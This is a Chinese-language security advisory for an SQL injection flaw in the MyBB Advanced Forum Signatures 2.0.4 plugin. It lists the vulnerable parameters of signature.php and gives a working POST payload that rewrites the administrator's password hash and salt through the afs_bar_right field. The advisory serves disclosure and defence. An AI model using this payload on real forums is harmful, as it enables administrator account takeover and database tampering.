发布日期：2011-10-14
更新日期：2011-10-14

受影响系统：

MyBB Advanced Forum Signatures 2.x

描述：

---

BUGTRAQ  ID: 50051
CVE(CAN) ID: CVE-2011-5277,CVE-2011-5278

MyBB是一款流行的Web论坛程序。

MyBB Advanced Forum Signatures 2.0.4插件在实现上存在SQL注入漏洞，远程攻击者可利用此漏洞控制应用程序、访问或修改数据。

此漏洞源于signature.php脚本没有正确过滤用户提供给'afs_type', 'afs_background', 'afs_showonline', 'afs_bar_left', 'afs_bar_center', 'afs_bar_right', 'afs_full_line1', 'afs_full_line2', 'afs_full_line3', 'afs_full_line4', 'afs_full_line5' 和'afs_full_line6'参数的输入，允许攻击者在后端数据库注入或操作SQL查询。

<*来源：Mario_Vs
  
  链接：http://osvdb.org/show/osvdb/76295
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

POST -&gt; afs_html=&lt;a+href="http://www.example.com/mybb"&gt;&lt;img+src="http://www.example.com/mybb/signature.php?uid=1"+alt=""+/&gt;&lt;/a&gt;&amp;afs_bbcode=[url=http://www.example.com/mybb][img]http://www.example.com/mybb/signature.php?uid=1[/img][/url]&amp;afs_type=bar&amp;afs_background=Default_Blue&amp;afs_showonline=1&amp;afs_full_line1=username&amp;afs_full_line2=usergroup&amp;afs_full_line3=postcount&amp;afs_full_line4=registrationdate&amp;afs_full_line5=reputation&amp;afs_full_line6=blank&amp;afs_bar_left=username&amp;afs_bar_center=usergroup&amp;afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg' WHERE `uid`='1';--

建议：

---

厂商补丁：

MyBB
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mybboard.com/

浏览次数：3656
严重程度：0（网友投票）